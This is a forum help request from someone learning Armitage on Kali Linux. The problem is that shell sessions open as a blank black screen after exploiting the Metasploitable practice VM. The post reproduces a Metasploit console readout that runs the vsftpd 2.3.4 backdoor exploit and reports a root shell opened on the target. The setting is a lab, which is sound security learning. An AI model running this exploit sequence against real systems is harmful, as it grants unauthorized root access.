Armitage: Exploit Shells (Ex: Shell 1) Interaction Does Not Load Properly; Displays Black Screen

Aug 3, 2018 09:53 PM

Hi All,

(all exploits that result in shell come up as black, blank screens when I interact with Shells; No response to commands)

So I have been learning Armitage GUI; watching/reading tutorials and following along step-by-step & I have noticed I keep having the same issue regardless of tutorial video or text. I will do my best to clarify as best as possible. When I write AND/OR on my step-by-step display it means I have tried a combination as an attempt to blind troubleshoot

(HACKING METASPLOITABLE)

  1. Start Armitage Load
  2. Imported AND/OR Add Host
  3. Imported Zenmap Scans (XLS) AND/OR Conducted NMAP Scans via Armitage
  4. Selected Find Attacks AND/OR Hail Mary Attack
  5. Launch Exploit (in this example I used: unix/ftp/vsftpd234backdoor)
  6. READOUT:

msf > use exploit/unix/ftp/vsftpd234backdoor

msf exploit(unix/ftp/vsftpd234backdoor) > set TARGET 0

TARGET => 0

msf exploit(unix/ftp/vsftpd234backdoor) > set PAYLOAD cmd/unix/interact

PAYLOAD => cmd/unix/interact

msf exploit(unix/ftp/vsftpd234backdoor) > set LHOST MY IP ADDRESS HERE

LHOST => ME

msf exploit(unix/ftp/vsftpd234backdoor) > set LPORT 23426

LPORT => 23426

msf exploit(unix/ftp/vsftpd234backdoor) > set RPORT 21

RPORT => 21

msf exploit(unix/ftp/vsftpd234backdoor) > set RHOST TARGET IP ADDRESS HERE

RHOST => TARGET

msf exploit(unix/ftp/vsftpd234backdoor) > exploit -j

* Exploit running as background job 1.

* TARGET:21 - Banner: 220 (vsFTPd 2.3.4)

* TARGET:21 - USER: 331 Please specify the password.

  • TARGET:21 - Backdoor service has been spawned, handling...
  • TARGET:21 - UID: uid=0(root) gid=0(root)

Found shell.

* Command shell session 1 opened (ME-> TARGET) at 2018-08-03 17:33:20 -0400

  1. Right Click on Exploited Device
  2. Select Shell 1 > Interact
  3. Shell 1 Tab Loads & Displays Blank Screen (it actually displays only this | on an all black screen
  • Does not respond to commands
  • All successful shell exploits respond the same way

Troubleshooting Steps Taken:

  1. Googled, Googled, and more Google searches of the issues
  2. Restarted Armitage
  3. Restarted PC
  4. Tried Different Exploits
  5. Tried Different Targets
  6. Tried Different Shells
  7. Searched Forums
  8. Ran Updates

I am using: Kali Linux 32-Bit 2018.2 on a Hard Drive as its own OS

Hid the victim PC as it displays my network

636689047659515644.jpg

Comments

No Comments Exist

Be the first, drop a comment!